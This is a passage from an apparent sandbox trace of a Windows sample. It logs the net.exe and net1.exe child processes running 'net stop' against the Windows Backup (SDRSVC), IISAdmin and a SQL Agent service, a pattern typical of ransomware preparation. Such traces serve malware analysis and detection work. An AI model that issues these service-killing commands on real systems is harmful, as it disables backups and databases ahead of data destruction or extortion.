(_String1="continue", _String2="SDRSVC") returned -16 [0205.693] _wcsicmp (_String1="cont", _String2="SDRSVC") returned -16 [0205.693] _wcsicmp (_String1="file", _String2="SDRSVC") returned -13 [0205.693] _wcsicmp (_String1="files", _String2="SDRSVC") returned -13 [0205.693] _wcsicmp (_String1="group", _String2="SDRSVC") returned -12 [0205.693] _wcsicmp (_String1="groups", _String2="SDRSVC") returned -12 [0205.693] _wcsicmp (_String1="help", _String2="SDRSVC") returned -11 [0205.693] _wcsicmp (_String1="helpmsg", _String2="SDRSVC") returned -11 [0205.693] _wcsicmp (_String1="localgroup", _String2="SDRSVC") returned -7 [0205.693] _wcsicmp (_String1="pause", _String2="SDRSVC") returned -3 [0205.693] _wcsicmp (_String1="session", _String2="SDRSVC") returned 1 [0205.693] _wcsicmp (_String1="sessions", _String2="SDRSVC") returned 1 [0205.693] _wcsicmp (_String1="sess", _String2="SDRSVC") returned 1 [0205.693] _wcsicmp (_String1="share", _String2="SDRSVC") returned 4 [0205.693] _wcsicmp (_String1="start", _String2="SDRSVC") returned 16 [0205.693] _wcsicmp (_String1="stats", _String2="SDRSVC") returned 16 [0205.693] _wcsicmp (_String1="statistics", _String2="SDRSVC") returned 16 [0205.693] _wcsicmp (_String1="stop", _String2="SDRSVC") returned 16 [0205.693] _wcsicmp (_String1="time", _String2="SDRSVC") returned 1 [0205.693] _wcsicmp (_String1="user", _String2="SDRSVC") returned 2 [0205.693] _wcsicmp (_String1="users", _String2="SDRSVC") returned 2 [0205.693] _wcsicmp (_String1="msg", _String2="SDRSVC") returned -6 [0205.693] _wcsicmp (_String1="messenger", _String2="SDRSVC") returned -6 [0205.693] _wcsicmp (_String1="receiver", _String2="SDRSVC") returned -1 [0205.693] _wcsicmp (_String1="rcv", _String2="SDRSVC") returned -1 [0205.693] _wcsicmp (_String1="netpopup", _String2="SDRSVC") returned -5 [0205.693] _wcsicmp (_String1="redirector", _String2="SDRSVC") returned -1 [0205.693] _wcsicmp (_String1="redir", _String2="SDRSVC") returned -1 [0205.693] _wcsicmp (_String1="rdr", _String2="SDRSVC") returned -1 [0205.693] _wcsicmp (_String1="workstation", _String2="SDRSVC") returned 4 [0205.693] _wcsicmp (_String1="work", _String2="SDRSVC") returned 4 [0205.693] _wcsicmp (_String1="wksta", _String2="SDRSVC") returned 4 [0205.693] _wcsicmp (_String1="prdr", _String2="SDRSVC") returned -3 [0205.693] _wcsicmp (_String1="devrdr", _String2="SDRSVC") returned -15 [0205.693] _wcsicmp (_String1="lanmanworkstation", _String2="SDRSVC") returned -7 [0205.693] _wcsicmp (_String1="server", _String2="SDRSVC") returned 1 [0205.693] _wcsicmp (_String1="svr", _String2="SDRSVC") returned 18 [0205.694] _wcsicmp (_String1="srv", _String2="SDRSVC") returned 14 [0205.694] _wcsicmp (_String1="lanmanserver", _String2="SDRSVC") returned -7 [0205.694] _wcsicmp (_String1="alerter", _String2="SDRSVC") returned -18 [0205.694] _wcsicmp (_String1="netlogon", _String2="SDRSVC") returned -5 [0205.694] _wcsupr (in: _String="SDRSVC" | out: _String="SDRSVC") returned="SDRSVC" [0205.694] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3d54b0 [0205.696] GetServiceKeyNameW (in: hSCManager=0x3d54b0, lpDisplayName="SDRSVC", lpServiceName=0x64aaf0, lpcchBuffer=0x1bf830 | out: lpServiceName="", lpcchBuffer=0x1bf830) returned 0 [0205.697] _wcsicmp (_String1="msg", _String2="SDRSVC") returned -6 [0205.697] _wcsicmp (_String1="messenger", _String2="SDRSVC") returned -6 [0205.697] _wcsicmp (_String1="receiver", _String2="SDRSVC") returned -1 [0205.697] _wcsicmp (_String1="rcv", _String2="SDRSVC") returned -1 [0205.697] _wcsicmp (_String1="redirector", _String2="SDRSVC") returned -1 [0205.697] _wcsicmp (_String1="redir", _String2="SDRSVC") returned -1 [0205.697] _wcsicmp (_String1="rdr", _String2="SDRSVC") returned -1 [0205.697] _wcsicmp (_String1="workstation", _String2="SDRSVC") returned 4 [0205.697] _wcsicmp (_String1="work", _String2="SDRSVC") returned 4 [0205.697] _wcsicmp (_String1="wksta", _String2="SDRSVC") returned 4 [0205.697] _wcsicmp (_String1="prdr", _String2="SDRSVC") returned -3 [0205.697] _wcsicmp (_String1="devrdr", _String2="SDRSVC") returned -15 [0205.697] _wcsicmp (_String1="lanmanworkstation", _String2="SDRSVC") returned -7 [0205.697] _wcsicmp (_String1="server", _String2="SDRSVC") returned 1 [0205.697] _wcsicmp (_String1="svr", _String2="SDRSVC") returned 18 [0205.697] _wcsicmp (_String1="srv", _String2="SDRSVC") returned 14 [0205.697] _wcsicmp (_String1="lanmanserver", _String2="SDRSVC") returned -7 [0205.697] _wcsicmp (_String1="alerter", _String2="SDRSVC") returned -18 [0205.697] _wcsicmp (_String1="netlogon", _String2="SDRSVC") returned -5 [0205.697] NetServiceControl (in: servername=0x0, service="SDRSVC", opcode=0x0, arg=0x0, bufptr=0x1bf82c | out: bufptr=0x1bf82c) returned 0x0 [0205.699] NetApiBufferAllocate (in: ByteCount=0xfa0, Buffer=0x1bf808 | out: Buffer=0x1bf808*=0x3d7860) returned 0x0 [0205.699] OpenServiceW (hSCManager=0x3d54b0, lpServiceName="SDRSVC", dwDesiredAccess=0xc) returned 0x3d55c8 [0205.699] QueryServiceStatus (in: hService=0x3d55c8, lpServiceStatus=0x1bf7dc | out: lpServiceStatus=0x1bf7dc*(dwServiceType=0x10, dwCurrentState=0x1, dwControlsAccepted=0x0, dwWin32ExitCode=0x435, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0205.699] GetServiceDisplayNameW (in: hSCManager=0x3d54b0, lpServiceName="SDRSVC", lpDisplayName=0x651fc0, lpcchBuffer=0x1bf7c0 | out: lpDisplayName="Windows Backup", lpcchBuffer=0x1bf7c0) returned 1 [0205.699] NetApiBufferFree (Buffer=0x3d7860) returned 0x0 [0205.699] CloseServiceHandle (hSCObject=0x3d55c8) returned 1 [0205.700] wcscpy_s (in: _Destination=0x64a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0205.700] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a80000 [0205.700] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdc1, dwLanguageId=0x0, lpBuffer=0x64b338, nSize=0x800, Arguments=0x649dd8 | out: lpBuffer="The Windows Backup service is not started.\r\n") returned 0x2c [0205.702] GetFileType (hFile=0x26c) returned 0x3 [0205.702] LocalAlloc (uFlags=0x0, uBytes=0x58) returned 0x3d6268 [0205.702] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The Windows Backup service is not started.\r\n", cchWideChar=44, lpMultiByteStr=0x3d6268, cbMultiByte=88, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The Windows Backup service is not started.\r\n", lpUsedDefaultChar=0x0) returned 44 [0205.702] WriteFile (in: hFile=0x26c, lpBuffer=0x3d6268, nNumberOfBytesToWrite=0x2c, lpNumberOfBytesWritten=0x1bf730, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1bf730, lpOverlapped=0x0) returned 0 [0205.702] LocalFree (hMem=0x3d6268) returned 0x0 [0205.702] GetFileType (hFile=0x26c) returned 0x3 [0205.702] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3d6268 [0205.702] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3d6268, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n=", lpUsedDefaultChar=0x0) returned 2 [0205.702] WriteFile (in: hFile=0x26c, lpBuffer=0x3d6268, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1bf730, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1bf730, lpOverlapped=0x0) returned 0 [0205.702] LocalFree (hMem=0x3d6268) returned 0x0 [0205.702] _ultow (in: _Dest=0xdc1, _Radix=1832800 | out: _Dest=0xdc1) returned="3521" [0205.702] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a80000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x64b338, nSize=0x800, Arguments=0x649dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 3521.\r\n") returned 0x34 [0205.702] GetFileType (hFile=0x26c) returned 0x3 [0205.702] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3d6268 [0205.702] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 3521.\r\n", cchWideChar=52, lpMultiByteStr=0x3d6268, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 3521.\r\n", lpUsedDefaultChar=0x0) returned 52 [0205.702] WriteFile (in: hFile=0x26c, lpBuffer=0x3d6268, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1bf73c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1bf73c, lpOverlapped=0x0) returned 0 [0205.702] LocalFree (hMem=0x3d6268) returned 0x0 [0205.702] GetFileType (hFile=0x26c) returned 0x3 [0205.702] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3d6268 [0205.702] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3d6268, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n=", lpUsedDefaultChar=0x0) returned 2 [0205.702] WriteFile (in: hFile=0x26c, lpBuffer=0x3d6268, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1bf73c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x1bf73c, lpOverlapped=0x0) returned 0 [0205.702] LocalFree (hMem=0x3d6268) returned 0x0 [0205.703] NetApiBufferFree (Buffer=0x3d1c60) returned 0x0 [0205.703] NetApiBufferFree (Buffer=0x3d1c78) returned 0x0 [0205.703] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SDRSVC /y" [0205.703] exit (_Code=2) Process: id = "230" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x6fb03000" os_pid = "0xbac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop IISAdmin /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 403 os_tid = 0xbbc Process: id = "231" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4de08000" os_pid = "0xbcc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "230" os_parent_pid = "0xbac" cmd_line = "C:\\Windows\\system32\\net1 stop IISAdmin /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 404 os_tid = 0xbdc [0205.842] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18fc6c | out: lpSystemTimeAsFileTime=0x18fc6c*(dwLowDateTime=0x43e0c7e0, dwHighDateTime=0x1d57a87)) [0205.842] GetCurrentProcessId () returned 0xbcc [0205.842] GetCurrentThreadId () returned 0xbdc [0205.842] GetTickCount () returned 0x116d125 [0205.842] QueryPerformanceCounter (in: lpPerformanceCount=0x18fc64 | out: lpPerformanceCount=0x18fc64*=32612718003) returned 1 [0205.843] GetModuleHandleA (lpModuleName=0x0) returned 0x210000 [0205.843] __set_app_type (_Type=0x1) [0205.843] __p__fmode () returned 0x74eb31f4 [0205.843] __p__commode () returned 0x74eb31fc [0205.843] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x21ffe6) returned 0x0 [0205.843] __getmainargs (in: _Argc=0x229064, _Argv=0x22906c, _Env=0x229068, _DoWildCard=0, _StartInfo=0x229024 | out: _Argc=0x229064, _Argv=0x22906c, _Env=0x229068) returned 0 [0205.843] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0205.843] GetConsoleOutputCP () returned 0x1b5 [0205.844] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x229080 | out: lpCPInfo=0x229080) returned 1 [0205.844] SetThreadUILanguage (LangId=0x0) returned 0x409 [0205.847] sprintf_s (in: _DstBuf=0x18fc24, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0205.847] setlocale (category=0, locale=".437") returned="English_United States.437" [0205.849] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0205.849] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0205.849] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop IISAdmin /y" [0205.849] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x18f9f0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0205.849] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x64) returned 0x4d3c00 [0205.849] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0205.850] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x18fbf4 | out: Buffer=0x18fbf4*=0x4d1c60) returned 0x0 [0205.850] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x18fbf4 | out: Buffer=0x18fbf4*=0x4d1c78) returned 0x0 [0205.850] _fileno (_File=0x74eb2900) returned -2 [0205.850] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0205.850] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0205.850] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0205.850] _wcsicmp (_String1="config", _String2="stop") returned -16 [0205.850] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0205.850] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0205.850] _wcsicmp (_String1="file", _String2="stop") returned -13 [0205.850] _wcsicmp (_String1="files", _String2="stop") returned -13 [0205.850] _wcsicmp (_String1="group", _String2="stop") returned -12 [0205.850] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0205.850] _wcsicmp (_String1="help", _String2="stop") returned -11 [0205.850] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0205.850] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0205.850] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0205.850] _wcsicmp (_String1="session", _String2="stop") returned -15 [0205.850] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0205.850] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0205.850] _wcsicmp (_String1="share", _String2="stop") returned -12 [0205.850] _wcsicmp (_String1="start", _String2="stop") returned -14 [0205.850] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0205.850] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0205.850] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0205.850] _wcsicmp (_String1="accounts", _String2="IISAdmin") returned -8 [0205.850] _wcsicmp (_String1="computer", _String2="IISAdmin") returned -6 [0205.851] _wcsicmp (_String1="config", _String2="IISAdmin") returned -6 [0205.851] _wcsicmp (_String1="continue", _String2="IISAdmin") returned -6 [0205.851] _wcsicmp (_String1="cont", _String2="IISAdmin") returned -6 [0205.851] _wcsicmp (_String1="file", _String2="IISAdmin") returned -3 [0205.851] _wcsicmp (_String1="files", _String2="IISAdmin") returned -3 [0205.851] _wcsicmp (_String1="group", _String2="IISAdmin") returned -2 [0205.851] _wcsicmp (_String1="groups", _String2="IISAdmin") returned -2 [0205.851] _wcsicmp (_String1="help", _String2="IISAdmin") returned -1 [0205.851] _wcsicmp (_String1="helpmsg", _String2="IISAdmin") returned -1 [0205.851] _wcsicmp (_String1="localgroup", _String2="IISAdmin") returned 3 [0205.851] _wcsicmp (_String1="pause", _String2="IISAdmin") returned 7 [0205.851] _wcsicmp (_String1="session", _String2="IISAdmin") returned 10 [0205.851] _wcsicmp (_String1="sessions", _String2="IISAdmin") returned 10 [0205.851] _wcsicmp (_String1="sess", _String2="IISAdmin") returned 10 [0205.851] _wcsicmp (_String1="share", _String2="IISAdmin") returned 10 [0205.851] _wcsicmp (_String1="start", _String2="IISAdmin") returned 10 [0205.851] _wcsicmp (_String1="stats", _String2="IISAdmin") returned 10 [0205.851] _wcsicmp (_String1="statistics", _String2="IISAdmin") returned 10 [0205.851] _wcsicmp (_String1="stop", _String2="IISAdmin") returned 10 [0205.851] _wcsicmp (_String1="time", _String2="IISAdmin") returned 11 [0205.851] _wcsicmp (_String1="user", _String2="IISAdmin") returned 12 [0205.851] _wcsicmp (_String1="users", _String2="IISAdmin") returned 12 [0205.851] _wcsicmp (_String1="msg", _String2="IISAdmin") returned 4 [0205.851] _wcsicmp (_String1="messenger", _String2="IISAdmin") returned 4 [0205.851] _wcsicmp (_String1="receiver", _String2="IISAdmin") returned 9 [0205.851] _wcsicmp (_String1="rcv", _String2="IISAdmin") returned 9 [0205.851] _wcsicmp (_String1="netpopup", _String2="IISAdmin") returned 5 [0205.851] _wcsicmp (_String1="redirector", _String2="IISAdmin") returned 9 [0205.851] _wcsicmp (_String1="redir", _String2="IISAdmin") returned 9 [0205.851] _wcsicmp (_String1="rdr", _String2="IISAdmin") returned 9 [0205.851] _wcsicmp (_String1="workstation", _String2="IISAdmin") returned 14 [0205.851] _wcsicmp (_String1="work", _String2="IISAdmin") returned 14 [0205.851] _wcsicmp (_String1="wksta", _String2="IISAdmin") returned 14 [0205.851] _wcsicmp (_String1="prdr", _String2="IISAdmin") returned 7 [0205.851] _wcsicmp (_String1="devrdr", _String2="IISAdmin") returned -5 [0205.851] _wcsicmp (_String1="lanmanworkstation", _String2="IISAdmin") returned 3 [0205.851] _wcsicmp (_String1="server", _String2="IISAdmin") returned 10 [0205.851] _wcsicmp (_String1="svr", _String2="IISAdmin") returned 10 [0205.852] _wcsicmp (_String1="srv", _String2="IISAdmin") returned 10 [0205.852] _wcsicmp (_String1="lanmanserver", _String2="IISAdmin") returned 3 [0205.852] _wcsicmp (_String1="alerter", _String2="IISAdmin") returned -8 [0205.852] _wcsicmp (_String1="netlogon", _String2="IISAdmin") returned 5 [0205.852] _wcsupr (in: _String="IISAdmin" | out: _String="IISADMIN") returned="IISADMIN" [0205.852] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4d54b8 [0205.854] GetServiceKeyNameW (in: hSCManager=0x4d54b8, lpDisplayName="IISADMIN", lpServiceName=0x22aaf0, lpcchBuffer=0x18fb90 | out: lpServiceName="", lpcchBuffer=0x18fb90) returned 0 [0205.855] _wcsicmp (_String1="msg", _String2="IISADMIN") returned 4 [0205.855] _wcsicmp (_String1="messenger", _String2="IISADMIN") returned 4 [0205.855] _wcsicmp (_String1="receiver", _String2="IISADMIN") returned 9 [0205.855] _wcsicmp (_String1="rcv", _String2="IISADMIN") returned 9 [0205.855] _wcsicmp (_String1="redirector", _String2="IISADMIN") returned 9 [0205.855] _wcsicmp (_String1="redir", _String2="IISADMIN") returned 9 [0205.855] _wcsicmp (_String1="rdr", _String2="IISADMIN") returned 9 [0205.855] _wcsicmp (_String1="workstation", _String2="IISADMIN") returned 14 [0205.855] _wcsicmp (_String1="work", _String2="IISADMIN") returned 14 [0205.855] _wcsicmp (_String1="wksta", _String2="IISADMIN") returned 14 [0205.855] _wcsicmp (_String1="prdr", _String2="IISADMIN") returned 7 [0205.855] _wcsicmp (_String1="devrdr", _String2="IISADMIN") returned -5 [0205.855] _wcsicmp (_String1="lanmanworkstation", _String2="IISADMIN") returned 3 [0205.855] _wcsicmp (_String1="server", _String2="IISADMIN") returned 10 [0205.855] _wcsicmp (_String1="svr", _String2="IISADMIN") returned 10 [0205.855] _wcsicmp (_String1="srv", _String2="IISADMIN") returned 10 [0205.855] _wcsicmp (_String1="lanmanserver", _String2="IISADMIN") returned 3 [0205.855] _wcsicmp (_String1="alerter", _String2="IISADMIN") returned -8 [0205.855] _wcsicmp (_String1="netlogon", _String2="IISADMIN") returned 5 [0205.855] NetServiceControl (in: servername=0x0, service="IISADMIN", opcode=0x0, arg=0x0, bufptr=0x18fb8c | out: bufptr=0x18fb8c) returned 0x889 [0205.856] wcscpy_s (in: _Destination=0x22a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0205.856] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0205.857] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x22b338, nSize=0x800, Arguments=0x229dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0205.858] GetFileType (hFile=0x26c) returned 0x3 [0205.858] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x4d3fe8 [0205.858] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x4d3fe8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0205.858] WriteFile (in: hFile=0x26c, lpBuffer=0x4d3fe8, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x18facc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18facc, lpOverlapped=0x0) returned 0 [0205.858] LocalFree (hMem=0x4d3fe8) returned 0x0 [0205.858] GetFileType (hFile=0x26c) returned 0x3 [0205.858] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4d6290 [0205.858] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4d6290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nM", lpUsedDefaultChar=0x0) returned 2 [0205.858] WriteFile (in: hFile=0x26c, lpBuffer=0x4d6290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x18facc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18facc, lpOverlapped=0x0) returned 0 [0205.858] LocalFree (hMem=0x4d6290) returned 0x0 [0205.858] _ultow (in: _Dest=0x889, _Radix=1637116 | out: _Dest=0x889) returned="2185" [0205.858] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x22b338, nSize=0x800, Arguments=0x229dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0205.859] GetFileType (hFile=0x26c) returned 0x3 [0205.859] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x4d6290 [0205.859] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x4d6290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0205.859] WriteFile (in: hFile=0x26c, lpBuffer=0x4d6290, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x18fad8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18fad8, lpOverlapped=0x0) returned 0 [0205.859] LocalFree (hMem=0x4d6290) returned 0x0 [0205.859] GetFileType (hFile=0x26c) returned 0x3 [0205.859] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4d6290 [0205.859] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4d6290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nM", lpUsedDefaultChar=0x0) returned 2 [0205.859] WriteFile (in: hFile=0x26c, lpBuffer=0x4d6290, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x18fad8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x18fad8, lpOverlapped=0x0) returned 0 [0205.859] LocalFree (hMem=0x4d6290) returned 0x0 [0205.859] NetApiBufferFree (Buffer=0x4d1c60) returned 0x0 [0205.860] NetApiBufferFree (Buffer=0x4d1c78) returned 0x0 [0205.860] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop IISAdmin /y" [0205.860] exit (_Code=2) Process: id = "232" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4de08000" os_pid = "0xbec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SQLAgent$PRACTTICEMGT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 405 os_tid = 0xbfc Process: id = "233" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6cb7f000" os_pid = "0x808" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "232" os_parent_pid = "0xbec" cmd_line = "C:\\Windows\\system32\\net1 stop SQLAgent$PRACTTICEMGT /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 406 os_tid = 0x5c8 [0206.061] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fa04 | out: lpSystemTimeAsFileTime=0x20fa04*(dwLowDateTime=0x44021b20, dwHighDateTime=0x1d57a87)) [0206.061] GetCurrentProcessId () returned 0x808 [0206.061] GetCurrentThreadId () returned 0x5c8 [0206.061] GetTickCount () returned 0x116d1ff [0206.061] QueryPerformanceCounter (in: lpPerformanceCount=0x20f9fc | out: lpPerformanceCount=0x20f9fc*=32634535424) returned 1 [0206.061] GetModuleHandleA (lpModuleName=0x0) returned 0x780000 [0206.061] __set_app_type (_Type=0x1) [0206.061] __p__fmode () returned 0x74eb31f4 [0206.061] __p__commode () returned 0x74eb31fc [0206.061] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x78ffe6) returned 0x0 [0206.061] __getmainargs (in: _Argc=0x799064, _Argv=0x79906c, _Env=0x799068, _DoWildCard=0, _StartInfo=0x799024 | out: _Argc=0x799064, _Argv=0x79906c, _Env=0x799068) returned 0 [0206.061] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0206.062] GetConsoleOutputCP () returned 0x1b5 [0206.062] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x799080 | out: lpCPInfo=0x799080) returned 1 [0206.062] SetThreadUILanguage (LangId=0x0) returned 0x409 [0206.065] sprintf_s (in: _DstBuf=0x20f9bc, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0206.065] setlocale (category=0, locale=".437") returned="English_United States.437" [0206.067] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0206.067] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0206.067] GetCommandLineW () 